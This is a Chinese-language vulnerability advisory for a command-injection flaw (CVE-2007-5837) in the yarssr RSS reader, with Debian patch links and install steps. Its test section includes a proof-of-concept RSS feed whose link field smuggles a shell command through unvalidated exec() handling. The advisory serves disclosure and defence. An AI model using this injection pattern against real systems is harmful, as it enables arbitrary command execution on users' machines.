发布日期：2007-10-31
更新日期：2007-11-01

受影响系统：

Yarssr Yarssr 0.2.2

描述：

---

BUGTRAQ  ID: 26273
CVE(CAN) ID: CVE-2007-5837

yarssr全称是Yet Another RSS Reader，可在GNOME通知区中显示RSS阅读结果。

yarssr的GUI.pm模块处理URL串时存在输入验证漏洞，远程攻击者可能利用此漏洞在用户系统上执行恶意命令。

yarssr的GUI.pm模块没有正确地验证URL便在exec()语句中使用启动浏览器，如果用户受骗点击了恶意的feed链接的话，就可能以当前用户的权限注入并执行任意命令。成功攻击要求禁用了“Gnome default” URL处理。

<*来源：Duncan Gilmore
  
  链接：http://secunia.com/advisories/27454/
        http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=448721
        http://www.debian.org/security/2008/dsa-1477
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?xml version="1.0" encoding="ISO-8859-1" ?>
- <rss version="2.0" xmlns:blogChannel="http://www.example.com/blogChannelModule">
- <channel>
  <title>test feed</title>
- <item>
  <title>test post - create /tmp/created_file</title>
  <link>http://www.example2.com";perl -e "print 'could run anything here' " > "/tmp/created_file</link>
  <pubDate>Fri, 26 Oct 2007 14:10:25 +0300</pubDate>
  </item>
  </channel>
  </rss>

建议：

---

厂商补丁：

Debian
------
Debian已经为此发布了一个安全公告（DSA-1477-1）以及相应补丁:
DSA-1477-1：New yarssr packages fix arbitrary shell command
链接：http://www.debian.org/security/2008/dsa-1477

补丁下载：
Source archives:

http://security.debian.org/pool/updates/main/y/yarssr/yarssr_0.2.2-1etch1.diff.gz
Size/MD5 checksum:     6420 105059b6e1b31d82b77ae3bb2d788fa6
http://security.debian.org/pool/updates/main/y/yarssr/yarssr_0.2.2.orig.tar.gz
Size/MD5 checksum:    21077 1825b214043c8d37fc8bad6935f0137a
http://security.debian.org/pool/updates/main/y/yarssr/yarssr_0.2.2-1etch1.dsc
Size/MD5 checksum:      584 83e4a6cb616defe9d78f55ef06d6379c

Architecture independent packages:

http://security.debian.org/pool/updates/main/y/yarssr/yarssr_0.2.2-1etch1_all.deb
Size/MD5 checksum:    23498 d8bd255215bdb7042260997fb76741cd

补丁安装方法：

1. 手工安装补丁包：

  首先，使用下面的命令来下载补丁软件：
  # wget url  (url是补丁下载链接地址)

  然后，使用下面的命令来安装补丁：  
  # dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包：

   首先，使用下面的命令更新内部数据库：
   # apt-get update
  
   然后，使用下面的命令安装更新软件包：
   # apt-get upgrade

Yarssr
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://yarssr.sourceforge.net/

浏览次数：2862
严重程度：0（网友投票）